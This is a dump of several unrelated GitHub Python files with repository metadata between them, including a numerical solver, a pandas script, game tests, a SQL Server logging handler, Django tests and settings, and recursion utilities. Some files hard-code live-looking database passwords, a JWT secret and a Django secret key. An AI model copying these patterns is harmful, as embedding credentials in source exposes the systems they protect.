    return ("Rodou, rodou e não chegou em lugar nenhum.")
# Example system — diagonally dominant, so Gauss-Jacobi converges.
A = [[10,2,1],[1,5,1],[2,3,10]]
b = [7,-8,6]
print("# Matriz A: ")
showMatrix(A)
print("# Vetor b: ")
print(b)
print()
print("# Matriz de Coeficientes xi's: ")
print(gaussJ(A,b))
|
[
"noreply@github.com"
] |
dcalds.noreply@github.com
|
36470e136c44f6cf01b439a2f5659da400da4274
|
8b6edb9665bf90fe93d224fd2903e879d6f92f1d
|
/set_transfer/check_na.py
|
7cef8b64c7a50543db03d289a36fec38231fdfb5
|
[] |
no_license
|
Mandyli1996/Multi-modal-learning-for-Neural-Record-Linkage
|
808836f8b9f059e7fcf01db0a202bb100f27a806
|
d6ada3bbc226adfa5ef5cfaae9b648e9b426921a
|
refs/heads/master
| 2022-01-31T12:18:05.429898
| 2019-08-16T01:43:46
| 2019-08-16T01:43:46
| 197,054,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 569
|
py
|
import pandas as pd
import numpy as np
ls = ['train_1', 'train_2', 'test_1', 'test_2', 'val_1', 'val_2']
def fillna_price(ls):
    """Replace missing values in each CSV's 'price' column with the column mean.

    ls: iterable of file-name stems; '<item>.csv' is read, patched and
        rewritten in place.
    """
    for item in ls:
        original = pd.read_csv(item + '.csv')
        original['price'] = original['price'].fillna(original['price'].mean())
        # index=False: without it the DataFrame index is written as an extra
        # unnamed column, so every run of this in-place rewrite grew the file
        # by one column.
        original.to_csv(item + '.csv', index=False)
fillna_price(ls)
# Spot check: after filling, test_1.csv should contain no missing prices.
test_1 = pd.read_csv('test_1.csv')
print(test_1['price'].isna().sum())
#print(original['title_clean'].isna().sum() , 'title')
#print(original['price'].isna().sum() , 'price')
#print(original['lon'].isna().sum(), 'lon')
#print(original[''])
|
[
"noreply@github.com"
] |
Mandyli1996.noreply@github.com
|
ff3cada1d4caaf3448a84be2cf4ae3e62ab27d75
|
b2c38070db99d8245e3d62b4591188744c793363
|
/tests/Actors/test_mcts_player.py
|
98047991aafb840ce2c56aee7ae008fbe2be64a7
|
[] |
no_license
|
drieswijns/ahorn
|
0bd03579b44ed0d65959ddbe9b2358f11b7d590a
|
8d18f538fcf111c91fcf3287d4c5daf1b4b2e58d
|
refs/heads/master
| 2021-01-17T17:33:13.994289
| 2016-08-02T15:08:21
| 2016-08-02T15:08:21
| 64,645,562
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 766
|
py
|
from ahorn.TicTacToe.States import TicTacToeState
from ahorn.Actors import RandomPlayer, MCTSPlayer
from ahorn import Controller
players = [RandomPlayer(), MCTSPlayer(simulation_count=100)]


def test_mcts_player():
    """Play N games of TicTacToe and check MCTS beats random play on average."""
    n_games = 10
    totals = [0, 0]
    for _ in range(n_games):
        start = TicTacToeState(players)
        final_state = Controller(start, verbose=True).play()
        for idx, player in enumerate(players):
            totals[idx] += final_state.get_utility(player)
    averages = [total / n_games for total in totals]
    # MCTSPlayer should be better than RandomPlayer
    assert(averages[1] > averages[0])
|
[
"dries.wijns@gmail.com"
] |
dries.wijns@gmail.com
|
23f626cdf5f7a42a05e907d826ffbcf6ec8ab41c
|
e04dbc32247accf073e3089ed4013427ad182c7c
|
/ABC157/ABC157B.py
|
b62e75dac44f15b4639aa942fe1d9ec1945b4fc4
|
[] |
no_license
|
twobooks/atcoder_training
|
9deb237aed7d9de573c1134a858e96243fb73ca0
|
aa81799ec87cc9c9d76de85c55e99ad5fa7676b5
|
refs/heads/master
| 2021-10-28T06:33:19.459975
| 2021-10-20T14:16:57
| 2021-10-20T14:16:57
| 233,233,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,085
|
py
|
# import math
# from itertools import permutations as permus
# from fractions import gcd
# import numpy as np
# import scipy as scp
# Read the 3x3 bingo card as a flat list of 9 integers.
times = 3
cardnums = []
for _ in range(times):
    cardnums = cardnums + list(map(int,input().split())) # could also be written: S += [input()]
# Read the count and then the called numbers (one per line).
n = int(input())
times = n
bingonums = []
for _ in range(times):
    bingonums = bingonums + list(map(int,input().split())) # could also be written: S += [input()]
# Mark every called cell by overwriting it with the sentinel 101
# (assumes real card numbers never equal 101 — see bingo_check's 303 test).
for bingonum in bingonums:
    cardnums = [101 if cardnum == bingonum else cardnum for cardnum in cardnums]
def bingo_check(lis:list) -> str:
    """Return "Yes" when the marked card contains a complete line, else "No".

    Marked cells hold the sentinel 101, so a fully marked line sums to exactly
    303 = 3 * 101 (relies on real card values staying below 101 — the AtCoder
    problem guarantees this; confirm if reused elsewhere).
    """
    lines = (
        (0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows
        (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns
        (0, 4, 8), (2, 4, 6),              # diagonals
    )
    for a, b, c in lines:
        if lis[a] + lis[b] + lis[c] == 303:
            return "Yes"
    return "No"
# Report whether the card has a complete marked row/column/diagonal.
ans = bingo_check(cardnums)
print(ans)
|
[
"twobookscom@gmail.com"
] |
twobookscom@gmail.com
|
ec6c6936ebe54a339c4eeebe4ac4a9ac01f46bed
|
7ca9127408edf2ad90b4dcaebf0e67cf540990c4
|
/SQLLoggingHandler.py
|
f14dcc5817f88e294ae159b7af6ce1ecadca26be
|
[] |
no_license
|
aknimbal/ccbcu_aks_poc-master
|
34c44203ca227c32667f7cc6a818dfdc7aa503d9
|
2697185bfc1d9cd252b212098add8f99b0c245c0
|
refs/heads/master
| 2020-05-14T19:23:52.095601
| 2019-04-17T17:05:30
| 2019-04-17T17:05:30
| 181,928,960
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,663
|
py
|
import pypyodbc
import logging
import time
__version__ = "0.1.0"
initial_sql = """IF NOT EXISTS (SELECT * FROM sys.tables
WHERE name = N'Log' AND type = 'U')
CREATE TABLE Log(
[id] [int] IDENTITY(1,1) NOT NULL,
TimeStamp datetimeoffset(7),
Source TEXT,
LogLevel INT,
LogLevelName varchar(50),
Message TEXT,
Args TEXT,
Module TEXT,
FuncName TEXT,
[LineNo] INT,
Exception TEXT,
Process INT,
Thread TEXT,
ThreadName TEXT
)"""
insertion_sql = """INSERT INTO Log(
TimeStamp,
Source,
LogLevel,
LogLevelName,
Message,
Args,
Module,
FuncName,
[LineNo],
Exception,
Process,
Thread,
ThreadName
)
VALUES (
'%(dbtime)s',
'%(name)s',
%(levelno)d,
'%(levelname)s',
'%(msg)s',
'%(args)s',
'%(module)s',
'%(funcName)s',
%(lineno)d,
'%(exc_text)s',
%(process)d,
'%(thread)s',
'%(threadName)s'
);
"""
class SQLHandler(logging.Handler):
    """logging.Handler that persists every record into a SQL Server `Log` table.

    The ODBC connection is opened once in __init__ (autocommit on) and the Log
    table is created on first use via the module-level `initial_sql`.
    """

    # Parameterized INSERT (qmark placeholders). Values are bound by the ODBC
    # driver instead of being %-interpolated into the SQL text, which closes
    # the quoting/injection hole of the old `insertion_sql % record.__dict__`
    # approach and removes the need for manual quote doubling.
    _PARAM_INSERT_SQL = """INSERT INTO Log(
                    TimeStamp,
                    Source,
                    LogLevel,
                    LogLevelName,
                    Message,
                    Args,
                    Module,
                    FuncName,
                    [LineNo],
                    Exception,
                    Process,
                    Thread,
                    ThreadName
               )
               VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);"""

    def __init__(self, host, port, user, passwd, database):
        """Open the database connection and ensure the Log table exists."""
        logging.Handler.__init__(self)
        print("init SQLHandler")
        self.host = host
        self.port = port
        self.user = user
        self.passwd = passwd
        self.database = database
        connection_string = 'Driver={{SQL Server Native Client 11.0}};Server={0};Database={1};Uid={2};Pwd={3};'.format(host, database, user, passwd)
        self.conn = pypyodbc.connect(connection_string, autocommit=True)
        cursor = self.conn.cursor()
        cursor.execute(initial_sql)  # create the Log table if it is missing
        cursor.close()
        print("init end SQLHandler")

    def format_time(self, record):
        """
        Create a time stamp ('YYYY-mm-dd HH:MM:SS') on record.dbtime.
        """
        record.dbtime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(record.created))

    def format_msg(self, record):
        """Double single quotes in record.msg (legacy SQL-escaping helper).

        Kept for backward compatibility but no longer called from emit():
        parameter binding makes this escaping unnecessary, and it corrupted
        the stored message text.
        """
        record.msg = record.msg.replace("\'", "''")
        record.msg = record.msg.replace(" ' ", " '' ")
        record.msg = record.msg.replace("'", "''")
        record.msg = record.msg.strip("'")

    def format_exc_text(self, record):
        """Double single quotes in record.exc_text (legacy helper, see format_msg)."""
        if record.exc_text:
            record.exc_text = record.exc_text.replace("\'", "''")
            record.exc_text = record.exc_text.replace(" ' ", " '' ")
            record.exc_text = record.exc_text.replace("'", "''")
            record.exc_text = record.exc_text.strip("'")

    def emit(self, record):
        """Insert one log record into the Log table using bound parameters."""
        self.format(record)
        self.format_time(record)
        if record.exc_info:  # render the traceback for exception records
            record.exc_text = logging._defaultFormatter.formatException(record.exc_info)
        else:
            record.exc_text = ""
        params = (
            record.dbtime,
            record.name,
            record.levelno,
            record.levelname,
            str(record.msg),
            str(record.args),
            record.module,
            record.funcName,
            record.lineno,
            record.exc_text,
            record.process,
            str(record.thread),
            record.threadName,
        )
        cursor = self.conn.cursor()
        cursor.execute(self._PARAM_INSERT_SQL, params)
        cursor.close()
|
[
"noreply@github.com"
] |
aknimbal.noreply@github.com
|
fae6e4839e223b43e36d210ac4aa03db2a555bd9
|
4d2ab3c8feb5a78ed3e453722b3e4fb3733ee254
|
/fourthproj/fourthproj/urls.py
|
2b021ea656c9e8e8de7757117ee0b33fe450c409
|
[] |
no_license
|
aeuna/likelion_homework
|
88325337e6029f96bb92f822fce2e1e6e675ff11
|
3728d5074ca887bda546d9eb9dabd6fb30367b70
|
refs/heads/master
| 2022-12-17T17:41:06.559623
| 2020-09-18T15:48:33
| 2020-09-18T15:48:33
| 264,348,175
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
"""fourthproj URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
import homework.views
urlpatterns = [
    path('admin/', admin.site.urls),
    # Site root is served by the homework app's `idea` view.
    path('',homework.views.idea, name='idea')
]
|
[
"4294psy@naver.com"
] |
4294psy@naver.com
|
3891a408d1e89295ce8caa8807429df5ffb5a87e
|
39ba51b384a509585d703545b7a55a99280da84f
|
/0x0F-python-object_relational_mapping/13-model_state_delete_a.py
|
a30482c34119264fc6855ea507cbe64d2c1c5f2e
|
[] |
no_license
|
lepc1972/holbertonschool-higher_level_programming
|
5145700bcfbc3fc561cb999a3f7824c49214eeee
|
116017b0c652c381f056ae789eb22b656b9201df
|
refs/heads/master
| 2023-08-29T00:32:13.794293
| 2021-09-27T23:35:04
| 2021-09-27T23:35:04
| 361,802,877
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
#!/usr/bin/python3
'''delete states that contains letter a'''
from sys import argv
from model_state import Base, State
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
if __name__ == '__main__':
    # argv: [script, mysql_username, mysql_password, database_name]
    eng = create_engine(
        'mysql+mysqldb://{}:{}@localhost/{}'
        .format(argv[1], argv[2], argv[3]), pool_pre_ping=True)
    Base.metadata.create_all(eng)
    ses = sessionmaker(bind=eng)()
    # Bulk-delete every State whose name contains the letter 'a';
    # synchronize_session=False skips in-session object bookkeeping since the
    # session is committed and closed immediately afterwards.
    ses.query(State).filter(State.name.like('%a%')).\
        delete(synchronize_session=False)
    ses.commit()
    ses.close()
|
[
"githublepc@gmail.com"
] |
githublepc@gmail.com
|
9b91d6a99d9a8eb90a69f3a029470c191d888eb5
|
fb073e9b08d6318035d3d3350c5406270758ae5a
|
/mission_api/tests.py
|
77b1b785cd6899aa938aead899708525095a7265
|
[
"MIT"
] |
permissive
|
JustinWingChungHui/OITS_UI
|
d6bff2c8ecc67e9029d1a4eac9517a5f9b070282
|
3456f1938d0cabd4476e7e986f374cf550ab9ccd
|
refs/heads/master
| 2023-08-07T21:28:37.347066
| 2021-02-15T19:33:19
| 2021-02-15T19:33:19
| 254,941,147
| 0
| 1
|
MIT
| 2021-09-22T18:52:00
| 2020-04-11T19:35:15
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,858
|
py
|
from django.test import TestCase, Client
from rest_framework.test import APIClient
from oits_params.models import OitsParams
from oits_params.default_data import esa_mission
import json
class ViewsTestCase(TestCase):
    """Exercises the /api/mission/ endpoints: list, create, retrieve, delete, cancel."""

    def setUp(self):
        self.params = OitsParams.objects.create(parameters='{test: "test"}', description='mydesc')

    def _saved_params(self, status=None, readonly=None):
        """Persist and return an OitsParams row based on the sample ESA mission."""
        record = OitsParams()
        record.description = 'description'
        record.parameters = esa_mission
        if status is not None:
            record.status = status
        if readonly is not None:
            record.readonly = readonly
        record.save()
        return record

    def test_mission_api_list(self):
        self._saved_params()
        response = APIClient().get('/api/mission/', format='json')
        self.assertEqual(response.status_code, 200)
        listing = json.loads(response.content)
        self.assertTrue(len(listing) > 0)

    def test_mission_api_create_validation_error(self):
        # Nbody=4 makes the payload inconsistent, so creation must be rejected.
        payload = json.loads(esa_mission)
        payload['description'] = 'test data'
        payload['Nbody'] = 4
        response = APIClient().post('/api/mission/', payload, format='json')
        self.assertEqual(response.status_code, 400)
        json.loads(response.content)

    def test_mission_api_create(self):
        payload = json.loads(esa_mission)
        payload['description'] = 'test data'
        response = APIClient().post('/api/mission/', payload, format='json')
        self.assertEqual(response.status_code, 200)
        body = json.loads(response.content)
        # get() raises DoesNotExist if the row was not persisted.
        self.assertIsNotNone(OitsParams.objects.get(pk=body['id']))

    def test_mission_api_retrieve(self):
        record = self._saved_params()
        response = APIClient().get('/api/mission/{0}/'.format(record.id), format='json')
        self.assertEqual(response.status_code, 200)
        body = json.loads(response.content)
        self.assertEqual(record.id, body['id'])

    def test_mission_api_delete(self):
        record = self._saved_params()
        response = APIClient().delete('/api/mission/{0}/'.format(record.id), format='json')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(0, OitsParams.objects.filter(id=record.id).count())

    def test_mission_api_delete_readonly(self):
        # Read-only missions must survive a delete attempt.
        record = self._saved_params(readonly=True)
        response = APIClient().delete('/api/mission/{0}/'.format(record.id), format='json')
        self.assertEqual(response.status_code, 400)
        self.assertEqual(1, OitsParams.objects.filter(id=record.id).count())

    def test_mission_api_cancel_mission_readonly(self):
        record = self._saved_params(status='N', readonly=True)
        response = Client().post('/api/mission/{0}/cancel/'.format(record.id), format='json')
        self.assertEqual(response.status_code, 400)

    def test_mission_api_cancel_mission(self):
        # Cancelling a pending ('P') mission flips its status to 'A'.
        record = self._saved_params(status='P', readonly=False)
        response = Client().post('/api/mission/{0}/cancel/'.format(record.id), format='json')
        self.assertEqual(response.status_code, 200)
        json.loads(response.content)
        self.assertEqual('A', OitsParams.objects.get(pk=record.id).status)
|
[
"wingchung@justinhui.co.uk"
] |
wingchung@justinhui.co.uk
|
8c062e751ab73fde9873852eeeb5f544c18b3104
|
3cb01b6018abead83e2d85e4ce5e49064ff2a476
|
/algorithms/recursion.py
|
f2f7d14b7a4aef2f2f93292d7597392b129cb25a
|
[] |
no_license
|
mkrotos/Algorithms
|
a73af4366f83ffeed5f54a3419ecfaa11af12603
|
74e768056137feedd27f89bbfffe051c0f5ae606
|
refs/heads/master
| 2022-12-20T09:51:13.526257
| 2020-10-24T15:40:57
| 2020-10-24T15:40:57
| 300,725,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
from typing import List
def sum(arr: List) -> int:
    """
    Sums elements in list using recursive algorithm
    :param arr: list of numbers
    :return: sum (0 for an empty list)
    """
    # Base case on the empty list rather than a single element: the original
    # raised IndexError for sum([]); the empty sum is 0.
    if not arr:
        return 0
    return arr[0] + sum(arr[1:])
def count_elements_in_list(arr: List) -> int:
    """
    Counts number of elements in list using recursive algorithm
    :param arr: list of any elements
    :return: number of elements
    """
    return 0 if not arr else 1 + count_elements_in_list(arr[1:])
def find_max(arr: List) -> int:
    """
    Finds max number in the list using recursive algorithm
    :param arr: list of numbers
    :return: max element (0 for an empty list, matching the old behaviour)
    """
    if not arr:
        return 0
    # Seed the recursion with the first element instead of 0, so lists of
    # all-negative numbers work correctly.
    return _find_max_recursion_case(arr[1:], arr[0])


def _find_max_recursion_case(arr: List, max: int) -> int:
    # Keep the larger of the running maximum and the head element. The
    # original unconditionally replaced `max` with arr[0], so it returned
    # the *last* element of the list rather than the maximum.
    if not arr:
        return max
    return _find_max_recursion_case(arr[1:], arr[0] if arr[0] > max else max)
|
[
"mar.krotos@gmail.com"
] |
mar.krotos@gmail.com
|
929f37b2eebd4b61f549ed641f8bc2cd109b15ac
|
7f3b0003e08af2419d79379134711323dc18a9da
|
/music_server/music_server/wsgi.py
|
e60195fe47efa28d1aaa7b8dd089580862d41a68
|
[
"MIT"
] |
permissive
|
slaymaker1907/baeuler
|
ae3fe9fb56039a69cdb410144d5d9e1c01b31918
|
4432e2dd57327bc5c8364b678e55fe27beaf1d9c
|
refs/heads/master
| 2020-05-18T05:46:14.895961
| 2019-04-30T08:00:04
| 2019-04-30T08:00:04
| 184,217,196
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for music_server project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before the application object is
# built; setdefault lets a deployment override the module via the environment.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'music_server.settings')
application = get_wsgi_application()
|
[
"dyllongagnier@gmail.com"
] |
dyllongagnier@gmail.com
|
b117ccbe2437fb59e44290805d563592bc806910
|
8f875bfd80bad1e2dbfa5648c8592141ad4fb711
|
/Ciclo1/210701/ej_csv2.py
|
c5b804352bd953efccd9949c6b1d05af8e816cb8
|
[] |
no_license
|
gonsan20/misiontic
|
02b4a2ed33559d35e1e12d9de391d19b59409fbb
|
8bceb0d0c4c8aeb6b26aae1e2f71b8432dc097c1
|
refs/heads/main
| 2023-06-16T18:19:52.773514
| 2021-07-13T22:58:17
| 2021-07-13T22:58:17
| 371,520,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
import csv
# Append three country/capital rows to Tabla.csv. newline='' stops the csv
# module from emitting extra blank lines on Windows; mode 'a' preserves any
# rows already in the file.
file_name="Tabla.csv"
with open(file_name, 'a', newline='') as csv_file:
    escribir=csv.writer(csv_file)
    escribir.writerows([['Egipto', 'El cairo'], ['Colombia','Bogota'], ["Australia", "Canberra"]])
|
[
"gonsan20@gmail.com"
] |
gonsan20@gmail.com
|
c4714273a7eb876e037c79b842099ba9120680eb
|
43d9cfd2ba21cb96b5af0b6912b33404ca89c898
|
/config.py
|
499bd9f2da827f03926cc801a60b7866233727b2
|
[] |
no_license
|
ulods123/imdb-backend
|
ed2ca3dc4e24f4b2b613475e9222fc79ac79526c
|
fdc2e383f00d881292a8dd62c3f863fe157153f1
|
refs/heads/main
| 2023-03-19T06:12:32.446269
| 2021-03-09T08:15:04
| 2021-03-09T08:15:04
| 345,031,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
class Config:
    # NOTE(review): live database and JWT credentials are hard-coded in source
    # control — load them from environment variables / a secrets store and
    # rotate the exposed values.
    # Connection settings for the MySQL database.
    class Database:
        USER='sql6397037'
        PASSWORD='P6mwKRcq4A'
        SERVER_NAME='sql6.freemysqlhosting.net'
        PORT=3306
        DATABASE_NAME='sql6397037'
    # Signing configuration for issued JSON Web Tokens.
    class JWT:
        SECRET_KEY='4Mk08YGLxdaL'
        ALGORITHM='HS512'
|
[
"urvish.lodaria@thinkanalytics.in"
] |
urvish.lodaria@thinkanalytics.in
|
aea1aac4ec02bd6df8afee1dda259248995ba532
|
5a9b0efdf7932043537570198cf6003e3aa52cdf
|
/blog_project/settings.py
|
a65847da222c4cc8c0b81d7df8d0c4dfc0e8879a
|
[] |
no_license
|
zhangjinsi/blog_project
|
c68fe9602982931b363291cdcd534574b747a465
|
8a18c54f3b36cef6c24828079ccf5e01dea5331e
|
refs/heads/master
| 2021-07-09T00:06:24.534526
| 2017-10-09T06:39:30
| 2017-10-09T06:39:30
| 106,245,599
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,783
|
py
|
#coding=utf-8
"""
Django settings for blog_project project.
Generated by 'django-admin startproject' using Django 1.8.18.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control — load it from the
# environment before deploying anywhere public.
SECRET_KEY = '+^hqxwb^4_@7!wkv06!v%61+=-2x%8e7tt2)l*rv!jsx14_g0l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'blog_project.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [
            os.path.join(BASE_DIR, 'templates'),
        ],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                # Project context processor injecting the SITE_* settings
                # below into every template.
                'blog.views.global_setting'
            ],
        },
    },
]
WSGI_APPLICATION = 'blog_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# NOTE(review): root/root credentials are hard-coded; acceptable only for
# local development.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'blogdb',
        'USER': 'root',
        'PASSWORD': 'root',
        'HOST': '',
        'PORT': '',
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL = '/uploads/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'uploads')
# Custom user model (replaces django.contrib.auth's default User)
AUTH_USER_MODEL = 'blog.User'
# Basic site information, exposed to templates via blog.views.global_setting
SITE_NAME = '张进思的个人博客'
SITE_DESC = '专注Python开发,欢迎和大家交流'
WEIBO_SINA = 'http://weibo.sina.com'
# NOTE(review): malformed URL — missing '//' after 'http:'; confirm intent.
WEIBO_TENCENT = 'http:weibo.qq.com'
PRO_RSS = 'http://www.baidu.com'
PRO_EMAIL = '270121263@qq.com'
# Custom logging configuration: rotating files under log/ plus console and
# admin-email output (Chinese comments translated to English).
LOGGING = {
    'version': 1,
    'disable_existing_loggers': True,
    'formatters': {
        'standard': {
            'format': '%(asctime)s [%(threadName)s:%(thread)d] [%(name)s:%(lineno)d] [%(module)s:%(funcName)s] [%(levelname)s]- %(message)s'} # log line format
    },
    'filters': {
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'class': 'django.utils.log.AdminEmailHandler',
            'include_html': True,
        },
        'default': {
            'level':'DEBUG',
            'class':'logging.handlers.RotatingFileHandler',
            'filename': 'log/all.log', # log output file
            'maxBytes': 1024*1024*5, # max file size before rotation (5 MB)
            'backupCount': 5, # number of rotated backups kept
            'formatter':'standard', # which formatter to use
        },
        'error': {
            'level':'ERROR',
            'class':'logging.handlers.RotatingFileHandler',
            'filename': 'log/error.log',
            'maxBytes':1024*1024*5,
            'backupCount': 5,
            'formatter':'standard',
        },
        'console':{
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'standard'
        },
        'request_handler': {
            'level':'DEBUG',
            'class':'logging.handlers.RotatingFileHandler',
            'filename': 'log/script.log',
            'maxBytes': 1024*1024*5,
            'backupCount': 5,
            'formatter':'standard',
        },
        # NOTE(review): 'scprits_handler' (sic) writes to the same
        # log/script.log file as 'request_handler' — confirm this sharing
        # is intended.
        'scprits_handler': {
            'level':'DEBUG',
            'class':'logging.handlers.RotatingFileHandler',
            'filename':'log/script.log',
            'maxBytes': 1024*1024*5,
            'backupCount': 5,
            'formatter':'standard',
        }
    },
    'loggers': {
        'django': {
            'handlers': ['default', 'console'],
            'level': 'DEBUG',
            'propagate': False
        },
        'django.request': {
            'handlers': ['request_handler'],
            'level': 'DEBUG',
            'propagate': False,
        },
        'scripts': {
            'handlers': ['scprits_handler'],
            'level': 'INFO',
            'propagate': False
        },
        'blog.views': {
            'handlers': ['default', 'error'],
            'level': 'DEBUG',
            'propagate': True
        },
    }
}
|
[
"2128265547@qq.com"
] |
2128265547@qq.com
|
6156d0dbcdc91a34293ace79598f6aefefc0072c
|
feaad3e97bd5940b94cdce8307b8469b5d04364c
|
/utils.py
|
fb21f48b2d9ae76051fea420285870bcc0efe512
|
[] |
no_license
|
Amirparsa-Sal/Telegram-chat-analyzer
|
cb8b51b3361bb94ee9bc4af37c210626f52421f6
|
fcd12e6ca0d81043154d79bf463cdb7b23afb8f7
|
refs/heads/master
| 2022-12-26T18:42:46.030861
| 2020-10-03T00:37:45
| 2020-10-03T00:37:45
| 295,259,123
| 9
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,694
|
py
|
import time
def merge(arr, start, mid, end, corresponding_arr=None):
    """Merge the sorted slices arr[start:mid+1] and arr[mid+1:end+1] in place.

    corresponding_arr, if given, is permuted exactly like arr so that
    corresponding_arr[i] stays paired with arr[i]. When omitted it aliases
    arr itself, making the pairing bookkeeping a harmless no-op.
    """
    if corresponding_arr is None:  # was `== None`; identity check is the idiom
        corresponding_arr = arr
    new_arr = []
    corr_new_arr = []
    left_pivot = start
    right_pivot = mid + 1
    while left_pivot != mid + 1 and right_pivot != end + 1:
        if arr[left_pivot] < arr[right_pivot]:
            new_arr.append(arr[left_pivot])
            corr_new_arr.append(corresponding_arr[left_pivot])
            left_pivot += 1
        else:
            new_arr.append(arr[right_pivot])
            corr_new_arr.append(corresponding_arr[right_pivot])
            right_pivot += 1
    # Copy whichever side still has elements remaining.
    if left_pivot == mid + 1:
        for i in range(right_pivot, end + 1):
            new_arr.append(arr[i])
            corr_new_arr.append(corresponding_arr[i])
    else:
        for i in range(left_pivot, end + 1):
            new_arr.append(arr[i])
            corr_new_arr.append(corresponding_arr[i])
    # Write the merged run back over arr[start:end+1] (and its companion).
    for i in range(end - start + 1):
        arr[start + i] = new_arr[i]
        corresponding_arr[start + i] = corr_new_arr[i]


def merge_sort(arr, start, end, corresponding_arr=None):
    """Recursively merge-sort arr[start:end+1] in place; corresponding_arr follows.

    The guard is `start >= end` rather than `start == end`: with the old
    equality test an empty range (start > end, e.g. merge_sort([], 0, -1))
    recursed forever.
    """
    if start >= end:
        return
    mid = (start + end) // 2
    merge_sort(arr, start, mid, corresponding_arr)
    merge_sort(arr, mid + 1, end, corresponding_arr)
    merge(arr, start, mid, end, corresponding_arr)
def find_date_number(date):
day = int(date[0])
year = int(date[2])
months = {
'January': 31,
'February': 28 + int(year%4==0),
'March': 31,
'April': 30,
'May': 31,
'June': 30,
'July': 31,
'August': 31,
'September': 30,
'October': 31,
'November': 30,
'December':31,
}
date_number = 0
for month, days in months.items():
if month == date[1]:
break
date_number += days
date_number += day + year * 365 + year//4
return date_number
|
[
"Amirparsa.s@aut.ac.ir"
] |
Amirparsa.s@aut.ac.ir
|
8a85134a570676adb97b23e45325b032f42b1cf0
|
ab4348843b3d5dc5ef29afda43b9371c64e0fe3c
|
/download.py
|
40a1d37917c4f0043dec106482e22434a74a7f27
|
[] |
no_license
|
khanu263/springer-auto-download
|
23e0f0cc446372d8c4ae07739e30426be69362e6
|
1aa05da7c52541a71962c5634b9c18c522e6c339
|
refs/heads/master
| 2022-04-26T15:52:51.268747
| 2020-04-29T01:16:27
| 2020-04-29T01:16:27
| 259,787,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
# download.py
# by Umair Khan
# Imports
import sys
import requests
from bs4 import BeautifulSoup
# Get list of links
with open(sys.argv[1], "r") as link_file:  # `with` closes the handle instead of leaking it
    links = link_file.read().splitlines()

# Go through each link
for link in links:

    # Get the name of the book
